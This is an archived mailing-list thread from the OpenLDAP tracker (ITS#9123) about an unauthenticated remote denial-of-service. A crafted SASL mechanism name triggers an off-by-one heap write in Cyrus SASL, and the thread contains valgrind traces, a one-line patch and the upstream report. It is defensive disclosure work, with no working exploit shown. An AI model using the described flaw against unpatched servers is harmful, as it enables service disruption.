http://highlandsun.com/hyc/ Chief Architect, OpenLDAP http://www.openldap.org/project/

1 0

Re: (ITS#9123) Unauthenticated remote denial-of-service
by stephan＠srlabs.de 28 Nov '19

28 Nov '19

--------------ms050304040807030706080402 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable Content-Language: en-US Created an issue upstream [1] and included the valgrind output and propos= ed patch. [1] https://github.com/cyrusimap/cyrus-sasl/issues/587 =C2=A0=C2=A0=C2=A0 -Stephan On 11/28/19 4:16 PM, Howard Chu wrote: > 5ddfddde do_bind: dn () SASL mech <garbage> > 5ddfddde =3D=3D> sasl_bind: dn=3D"" mech=3D<garbage> > datalen=3D0 > =3D=3D11019=3D=3D Thread 3: > =3D=3D11019=3D=3D Invalid write of size 1 > =3D=3D11019=3D=3D at 0x4B9B1DB: sasl_seterror (seterror.c:247) > =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418) > =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666) > =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279) > =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205) > =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:11= 85) > =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c:= 1342) > =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c= :1048) > =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479) > =3D=3D11019=3D=3D by 0x4EFA322: clone (clone.S:95) > =3D=3D11019=3D=3D Address 0x62032a8 is 0 bytes after a block of size 6= 00 alloc'd > =3D=3D11019=3D=3D at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gn= u/valgrind/vgpreload_memcheck-amd64-linux.so) > =3D=3D11019=3D=3D by 0x4B930A4: _buf_alloc (common.c:2186) > =3D=3D11019=3D=3D by 0x4B93299: _sasl_add_string (common.c:196) > =3D=3D11019=3D=3D by 0x4B9B2D4: sasl_seterror (seterror.c:187) > =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418) > =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666) > =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279) > =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205) > =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:11= 85) > =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c:= 1342) > =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c= :1048) > =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479) > =3D=3D11019=3D=3D > =3D=3D11019=3D=3D Invalid read of size 1 > =3D=3D11019=3D=3D at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu= /valgrind/vgpreload_memcheck-amd64-linux.so) > =3D=3D11019=3D=3D by 0x4E53DE4: __vfprintf_internal (vfprintf-intern= al.c:1688) > =3D=3D11019=3D=3D by 0x4E67029: __vsnprintf_internal (vsnprintf.c:11= 4) > =3D=3D11019=3D=3D by 0x3A1FFA: lutil_debug (debug.c:74) > =3D=3D11019=3D=3D by 0x266FF3: slap_sasl_log (sasl.c:146) > =3D=3D11019=3D=3D by 0x4B9B4CF: sasl_seterror (seterror.c:260) > =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418) > =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666) > =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279) > =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205) > =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:11= 85) > =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c:= 1342) > =3D=3D11019=3D=3D Address 0x62032a8 is 0 bytes after a block of size 6= 00 alloc'd > =3D=3D11019=3D=3D at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gn= u/valgrind/vgpreload_memcheck-amd64-linux.so) > =3D=3D11019=3D=3D by 0x4B930A4: _buf_alloc (common.c:2186) > =3D=3D11019=3D=3D by 0x4B93299: _sasl_add_string (common.c:196) > =3D=3D11019=3D=3D by 0x4B9B2D4: sasl_seterror (seterror.c:187) > =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418) > =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666) > =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279) > =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205) > =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:11= 85) > =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c:= 1342) > =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c= :1048) > =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479) --------------ms050304040807030706080402 Content-Type: application/pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFADCABgkqhkiG9w0BBwEAAKCC C5owggVLMIIEM6ADAgECAhBcqlOYsUipXhgfVtj/CAUVMA0GCSqGSIb3DQEBCwUAMIGCMQsw CQYDVQQGEwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAhBgNVBAoM GkFjdGFsaXMgUy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENsaWVudCBB dXRoZW50aWNhdGlvbiBDQSBHMTAeFw0xOTA1MjQwODA3MTdaFw0yMDA1MjQwODA3MTdaMBwx GjAYBgNVBAMMEXN0ZXBoYW5Ac3JsYWJzLmRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB CgKCAQEAmniYbaUHSdjBF3/m+2PVN14GEGxOSwHtd8WxH9mUXKEIW4XuImwNz8AoGfFOHc4D A1Tc/an6lONwAeBgj541N7aKSTxRphKnrJrpJarbUR2FM7u7Km7btUTBT9mm6OmympB+vWKa GkjQo2Gr3GRSfVDNLP/n70H8uthbgwPLuBfBt/dLHFrvYBpPtnH2EQqKc1SELSUPAuo9zaO/ ohwPb7Sss3vMOOtePGL0lcHjWCbdsstZ/DUzek9MQ6F+PkGYee3JSzvyXvrADheqUPHtYPd2 LPu6hZKbAGjoqRYHVbwITZIzu7QWB4YEXFCdMT6XIde5lvA0zR7hhb63HKUVewIDAQABo4IC IDCCAhwwDAYDVR0TAQH/BAIwADAfBgNVHSMEGDAWgBR+YPz4bKc9Pdeuk6F5Ao+zdCk79TBL BggrBgEFBQcBAQQ/MD0wOwYIKwYBBQUHMAKGL2h0dHA6Ly9jYWNlcnQuYWN0YWxpcy5pdC9j ZXJ0cy9hY3RhbGlzLWF1dGNsaWcxMBwGA1UdEQQVMBOBEXN0ZXBoYW5Ac3JsYWJzLmRlMEcG A1UdIARAMD4wPAYGK4EfARgBMDIwMAYIKwYBBQUHAgEWJGh0dHBzOi8vd3d3LmFjdGFsaXMu aXQvYXJlYS1kb3dubG9hZDAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwQwgegGA1Ud HwSB4DCB3TCBm6CBmKCBlYaBkmxkYXA6Ly9sZGFwMDUuYWN0YWxpcy5pdC9jbiUzZEFjdGFs aXMlMjBDbGllbnQlMjBBdXRoZW50aWNhdGlvbiUyMENBJTIwRzEsbyUzZEFjdGFsaXMlMjBT LnAuQS4vMDMzNTg1MjA5NjcsYyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7Ymlu YXJ5MD2gO6A5hjdodHRwOi8vY3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEhDTC1H MS9nZXRMYXN0Q1JMMB0GA1UdDgQWBBSM25yar8W0HyQ52pQLvwam2PQI1zAOBgNVHQ8BAf8E BAMCBaAwDQYJKoZIhvcNAQELBQADggEBADvK449WtB/GFtNr0TNrTnaNbtSuPz5poGt7nyUb neGYazzxvjBPI0a0A+h/++rHcAuYrCNP+/M0PWU3Jv4IDf6YwHGRQdXN4f9xhCtmBnFtfQ22 9anlEBvLZv5uEQSzZ6qhvZkqnq9WQ/ofb9q2GGwPfKa+QM4T8QFv5ZmogdXriH3gf4gJ1fbW 7Ig33y+xYXr8W4lQ3haAShGzV/FleypHafb/3ptGWNq3+diGKPxNpyU1BMq904OPAEBMCa5i 8+8kYsT8ug+t2uSqboWrutgr/y4bYxBrY56cdfgnLBqoHPEBkg8ONHMgiULphoOelPbOjHD0 by5aiDvNToIkdX4wggZHMIIEL6ADAgECAggs1IrTsR4PiTANBgkqhkiG9w0BAQsFADBrMQsw CQYDVQQGEwJJVDEOMAwGA1UEBwwFTWlsYW4xIzAhBgNVBAoMGkFjdGFsaXMgUy5wLkEuLzAz MzU4NTIwOTY3MScwJQYDVQQDDB5BY3RhbGlzIEF1dGhlbnRpY2F0aW9uIFJvb3QgQ0EwHhcN MTUwNTE0MDcxNDE1WhcNMzAwNTE0MDcxNDE1WjCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgM Bk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1 ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzEw ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDA/MGJVtmI4vQEZb/NCTWrKCkw/gzK 9yerHBHuhj1d5PVsRLYMVzOVl96Iio0tqduTKpPHJ1dn6TGhL3TvWpaxnrNL6nFKpcuz5FO+ d0RpbHmF0dlwo1YbOHLkWI7gZm8aUUicUSJpj504SmONa9J5em9wOmdjDoz0Be4ejgmGMLc/ 84r//lAVefO1NriJTrpGku145OAK2JELBk0rHwQV6qp9Oli98Rvgf3UTuf5jrWObR3YTx8nb AZNpJLCNzydMjYCle6OhzO6RvaQerBoY/erlS551ZydFlzrldSEr9norfYq+tC40/fYX/kzG S8QOcmlSee32IwTG8TOffXMNAgMBAAGjggHVMIIB0TBBBggrBgEFBQcBAQQ1MDMwMQYIKwYB BQUHMAGGJWh0dHA6Ly9vY3NwMDUuYWN0YWxpcy5pdC9WQS9BVVRILVJPT1QwHQYDVR0OBBYE FH5g/Phspz09166ToXkCj7N0KTv1MA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUUtiI OsifeGbtifN7OHCUyQICNtAwRQYDVR0gBD4wPDA6BgRVHSAAMDIwMAYIKwYBBQUHAgEWJGh0 dHBzOi8vd3d3LmFjdGFsaXMuaXQvYXJlYS1kb3dubG9hZDCB4wYDVR0fBIHbMIHYMIGWoIGT oIGQhoGNbGRhcDovL2xkYXAwNS5hY3RhbGlzLml0L2NuJTNkQWN0YWxpcyUyMEF1dGhlbnRp Y2F0aW9uJTIwUm9vdCUyMENBLG8lM2RBY3RhbGlzJTIwUy5wLkEuJTJmMDMzNTg1MjA5Njcs YyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7YmluYXJ5MD2gO6A5hjdodHRwOi8v Y3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEgtUk9PVC9nZXRMYXN0Q1JMMA4GA1Ud DwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEATZPO1SS+QRtKFlhzX2WJ8tl6PliMvMvE D+VbFmeywUukM/JJ/Myad3PcXTpLnWW3AN75uVPByl3NSXczZqUofds6vznmS71Gvq553Jr4 cZBRPQ6GoOjYrYIAT2cFx8A3GJ+N9PxfMKgLdy1/27HeiDVa4TxZNwtkqAIy41EGYm170LhS DTDeJeo/Orwq5FGhs0qp10+OTcSIr5AD4QUIKRrXE4uH/tw8ZMkw21rX/S7mguJdo4Ad4Au3 +ep5naRn6WLMryhO/iKflq8h/d6Vregvq+vClNxrtNnFNf3R7zTl1lA3ipFU909usGVa02jM ftJ0t4utyg3yXYRc7rX3QYAlh3KdNzYToTKstUZwMpRf3VWYJJGuoSmlntbTlNtZEuLr7A+M DOZOrZdKYp9qOruO5MqCSTDsUUkHKLFrQ11Jmix1BvdWQuobwQ5g5qZkuof6/u5rT66WDsU6 +IVt5nthH15E7zU7wULW4uC62XIYPb4YuOBCey+d4Oxs0BZ+SivL6qoDG9XNfk9JpCnaknnY BogfUw3WLb+B5FI/zdNEysWTC4gzMOFfEoVC+myk1zX29xOvLOO3A/jGrRY1LhhY9LhT72Zb 5TQKCeyDH18yIk1st+V/mpJvnePcAYeeMr+onM9rf3AVNctcHrjwXfDVB/1Ht5l5NEl8JBj9 8lQxggP2MIID8gIBATCBlzCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0G A1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoG A1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W 2P8IBRUwDQYJYIZIAWUDBAIBBQCgggIvMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJ KoZIhvcNAQkFMQ8XDTE5MTEyODE1MzkyM1owLwYJKoZIhvcNAQkEMSIEILb+contXMUwSpoY +bjTpOSSD1JRO5NsTR8vITqUHRb3MGwGCSqGSIb3DQEJDzFfMF0wCwYJYIZIAWUDBAEqMAsG CWCGSAFlAwQBAjAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcNAwICAUAw BwYFKw4DAgcwDQYIKoZIhvcNAwICASgwgagGCSsGAQQBgjcQBDGBmjCBlzCBgjELMAkGA1UE BhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3Rh bGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVu dGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W2P8IBRUwgaoGCyqGSIb3DQEJEAILMYGaoIGX MIGCMQswCQYDVQQGEwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAh BgNVBAoMGkFjdGFsaXMgUy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENs aWVudCBBdXRoZW50aWNhdGlvbiBDQSBHMQIQXKpTmLFIqV4YH1bY/wgFFTANBgkqhkiG9w0B AQEFAASCAQAjwtYcwMK6NjmGAw3mFwZ4wvD5eQPXdnRQM2NYYUHmd+VgkhX9PB5wLwg3ZphB KYhlweOqcRkcUUkD/uYR5+UpDN0DHRmSYCYwGyP2rdQ5xWkZ50BAj7wch5D9dFWAafUTMYl0 Zkvoloxv1fslTaEUdMZfxhLa4enf3Jt8IQUaVArKTcwrrLnrOAh4zfT4oKqVMyyMpz5r0mum l8u3HNDYpMUZV0v0UEB/nCodv5o3NucL1cJph7snGCYX55OeYX6OvkwV0uOwDHiCwLKxN4BY T3h4HXNRf4tXPLNngnByOznQ11xRvYIANBehYr45Q+3S5O6vW+MORqqI8x0sRHCaAAAAAAAA --------------ms050304040807030706080402--

1 0

Re: (ITS#9123) Unauthenticated remote denial-of-service
by hyc＠symas.com 28 Nov '19

28 Nov '19

Stephan Zeisberg wrote: > Hi Howard =E2=80=94 >=20 > Thanks for the quick reply. Will forward the report upstream to Cyrus S= ASL. For reference, this fixes the bug: vielle:/home/software/cyrus-sasl> git diff diff --git a/lib/common.c b/lib/common.c index bc3bf1df..9969d6aa 100644 --- a/lib/common.c +++ b/lib/common.c @@ -190,7 +190,7 @@ int _sasl_add_string(char **out, size_t *alloclen, if (add=3D=3DNULL) add =3D "(null)"; - addlen=3Dstrlen(add); /* only compute once */ + addlen=3Dstrlen(add)+1; /* only compute once */ if (_buf_alloc(out, alloclen, (*outlen)+addlen)!=3DSASL_OK) return SASL_NOMEM; Git history shows this bug has existed since the code was originally writ= ten in ommit 061698456069833e244d66ce33c8f82c2cd63ce3 Author: Rob Siemborski <rjs3(a)andrew.cmu.edu> Date: Tue Dec 4 01:59:43 2001 +0000 >=20 > Best >=20 > =C2=A0=C2=A0=C2=A0 -Stephan >=20 > On 11/28/19 3:54 PM, Howard Chu wrote: >> Resending with the non-printable chars omitted: >> >> Howard Chu wrote: >>> Thanks, but your trace clearly shows that this is a fault in Cyrus SA= SL, you should be reporting >>> this issue to them. >>> >>> valgrind confirms it as well: >>> >>> 5ddfddde do_bind: dn () SASL mech <garbage> >>> 5ddfddde =3D=3D> sasl_bind: dn=3D"" mech=3D<garbage> >>> datalen=3D0 >>> =3D=3D11019=3D=3D Thread 3: >>> =3D=3D11019=3D=3D Invalid write of size 1 >>> =3D=3D11019=3D=3D at 0x4B9B1DB: sasl_seterror (seterror.c:247) >>> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418) >>> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666) >>> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279) >>> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205) >>> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:= 1185) >>> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.= c:1342) >>> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool= .c:1048) >>> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479= ) >>> =3D=3D11019=3D=3D by 0x4EFA322: clone (clone.S:95) >>> =3D=3D11019=3D=3D Address 0x62032a8 is 0 bytes after a block of size= 600 alloc'd >>> =3D=3D11019=3D=3D at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-= gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >>> =3D=3D11019=3D=3D by 0x4B930A4: _buf_alloc (common.c:2186) >>> =3D=3D11019=3D=3D by 0x4B93299: _sasl_add_string (common.c:196) >>> =3D=3D11019=3D=3D by 0x4B9B2D4: sasl_seterror (seterror.c:187) >>> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418) >>> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666) >>> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279) >>> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205) >>> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:= 1185) >>> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.= c:1342) >>> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool= .c:1048) >>> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479= ) >>> =3D=3D11019=3D=3D >>> =3D=3D11019=3D=3D Invalid read of size 1 >>> =3D=3D11019=3D=3D at 0x483DF54: strlen (in /usr/lib/x86_64-linux-g= nu/valgrind/vgpreload_memcheck-amd64-linux.so) >>> =3D=3D11019=3D=3D by 0x4E53DE4: __vfprintf_internal (vfprintf-inte= rnal.c:1688) >>> =3D=3D11019=3D=3D by 0x4E67029: __vsnprintf_internal (vsnprintf.c:= 114) >>> =3D=3D11019=3D=3D by 0x3A1FFA: lutil_debug (debug.c:74) >>> =3D=3D11019=3D=3D by 0x266FF3: slap_sasl_log (sasl.c:146) >>> =3D=3D11019=3D=3D by 0x4B9B4CF: sasl_seterror (seterror.c:260) >>> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418) >>> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666) >>> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279) >>> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205) >>> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:= 1185) >>> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.= c:1342) >>> =3D=3D11019=3D=3D Address 0x62032a8 is 0 bytes after a block of size= 600 alloc'd >>> =3D=3D11019=3D=3D at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-= gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >>> =3D=3D11019=3D=3D by 0x4B930A4: _buf_alloc (common.c:2186) >>> =3D=3D11019=3D=3D by 0x4B93299: _sasl_add_string (common.c:196) >>> =3D=3D11019=3D=3D by 0x4B9B2D4: sasl_seterror (seterror.c:187) >>> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418) >>> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666) >>> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279) >>> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205) >>> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:= 1185) >>> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.= c:1342) >>> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool= .c:1048) >>> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479= ) >>> >>> >>> >>> >> >=20 --=20 -- Howard Chu CTO, Symas Corp. http://www.symas.com Director, Highland Sun http://highlandsun.com/hyc/ Chief Architect, OpenLDAP http://www.openldap.org/project/

1 0

Re: (ITS#9123) Unauthenticated remote denial-of-service
by stephan＠srlabs.de 28 Nov '19

28 Nov '19

--------------ms000905070707070901010503 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable Content-Language: en-US Hi Howard =E2=80=94 Thanks for the quick reply. Will forward the report upstream to Cyrus SAS= L. Best =C2=A0=C2=A0=C2=A0 -Stephan On 11/28/19 3:54 PM, Howard Chu wrote: > Resending with the non-printable chars omitted: > > Howard Chu wrote: >> Thanks, but your trace clearly shows that this is a fault in Cyrus SAS= L, you should be reporting >> this issue to them. >> >> valgrind confirms it as well: >> >> 5ddfddde do_bind: dn () SASL mech <garbage> >> 5ddfddde =3D=3D> sasl_bind: dn=3D"" mech=3D<garbage> >> datalen=3D0 >> =3D=3D11019=3D=3D Thread 3: >> =3D=3D11019=3D=3D Invalid write of size 1 >> =3D=3D11019=3D=3D at 0x4B9B1DB: sasl_seterror (seterror.c:247) >> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418) >> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666) >> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279) >> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205) >> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:1= 185) >> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c= :1342) >> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.= c:1048) >> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479)= >> =3D=3D11019=3D=3D by 0x4EFA322: clone (clone.S:95) >> =3D=3D11019=3D=3D Address 0x62032a8 is 0 bytes after a block of size = 600 alloc'd >> =3D=3D11019=3D=3D at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-g= nu/valgrind/vgpreload_memcheck-amd64-linux.so) >> =3D=3D11019=3D=3D by 0x4B930A4: _buf_alloc (common.c:2186) >> =3D=3D11019=3D=3D by 0x4B93299: _sasl_add_string (common.c:196) >> =3D=3D11019=3D=3D by 0x4B9B2D4: sasl_seterror (seterror.c:187) >> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418) >> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666) >> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279) >> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205) >> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:1= 185) >> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c= :1342) >> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.= c:1048) >> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479)= >> =3D=3D11019=3D=3D >> =3D=3D11019=3D=3D Invalid read of size 1 >> =3D=3D11019=3D=3D at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gn= u/valgrind/vgpreload_memcheck-amd64-linux.so) >> =3D=3D11019=3D=3D by 0x4E53DE4: __vfprintf_internal (vfprintf-inter= nal.c:1688) >> =3D=3D11019=3D=3D by 0x4E67029: __vsnprintf_internal (vsnprintf.c:1= 14) >> =3D=3D11019=3D=3D by 0x3A1FFA: lutil_debug (debug.c:74) >> =3D=3D11019=3D=3D by 0x266FF3: slap_sasl_log (sasl.c:146) >> =3D=3D11019=3D=3D by 0x4B9B4CF: sasl_seterror (seterror.c:260) >> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418) >> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666) >> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279) >> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205) >> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:1= 185) >> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c= :1342) >> =3D=3D11019=3D=3D Address 0x62032a8 is 0 bytes after a block of size = 600 alloc'd >> =3D=3D11019=3D=3D at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-g= nu/valgrind/vgpreload_memcheck-amd64-linux.so) >> =3D=3D11019=3D=3D by 0x4B930A4: _buf_alloc (common.c:2186) >> =3D=3D11019=3D=3D by 0x4B93299: _sasl_add_string (common.c:196) >> =3D=3D11019=3D=3D by 0x4B9B2D4: sasl_seterror (seterror.c:187) >> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418) >> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666) >> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279) >> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205) >> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:1= 185) >> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c= :1342) >> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.= c:1048) >> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479)= >> >> >> >> > --------------ms000905070707070901010503 Content-Type: application/pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFADCABgkqhkiG9w0BBwEAAKCC C5owggVLMIIEM6ADAgECAhBcqlOYsUipXhgfVtj/CAUVMA0GCSqGSIb3DQEBCwUAMIGCMQsw CQYDVQQGEwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAhBgNVBAoM GkFjdGFsaXMgUy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENsaWVudCBB dXRoZW50aWNhdGlvbiBDQSBHMTAeFw0xOTA1MjQwODA3MTdaFw0yMDA1MjQwODA3MTdaMBwx GjAYBgNVBAMMEXN0ZXBoYW5Ac3JsYWJzLmRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB CgKCAQEAmniYbaUHSdjBF3/m+2PVN14GEGxOSwHtd8WxH9mUXKEIW4XuImwNz8AoGfFOHc4D A1Tc/an6lONwAeBgj541N7aKSTxRphKnrJrpJarbUR2FM7u7Km7btUTBT9mm6OmympB+vWKa GkjQo2Gr3GRSfVDNLP/n70H8uthbgwPLuBfBt/dLHFrvYBpPtnH2EQqKc1SELSUPAuo9zaO/ ohwPb7Sss3vMOOtePGL0lcHjWCbdsstZ/DUzek9MQ6F+PkGYee3JSzvyXvrADheqUPHtYPd2 LPu6hZKbAGjoqRYHVbwITZIzu7QWB4YEXFCdMT6XIde5lvA0zR7hhb63HKUVewIDAQABo4IC IDCCAhwwDAYDVR0TAQH/BAIwADAfBgNVHSMEGDAWgBR+YPz4bKc9Pdeuk6F5Ao+zdCk79TBL BggrBgEFBQcBAQQ/MD0wOwYIKwYBBQUHMAKGL2h0dHA6Ly9jYWNlcnQuYWN0YWxpcy5pdC9j ZXJ0cy9hY3RhbGlzLWF1dGNsaWcxMBwGA1UdEQQVMBOBEXN0ZXBoYW5Ac3JsYWJzLmRlMEcG A1UdIARAMD4wPAYGK4EfARgBMDIwMAYIKwYBBQUHAgEWJGh0dHBzOi8vd3d3LmFjdGFsaXMu aXQvYXJlYS1kb3dubG9hZDAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwQwgegGA1Ud HwSB4DCB3TCBm6CBmKCBlYaBkmxkYXA6Ly9sZGFwMDUuYWN0YWxpcy5pdC9jbiUzZEFjdGFs 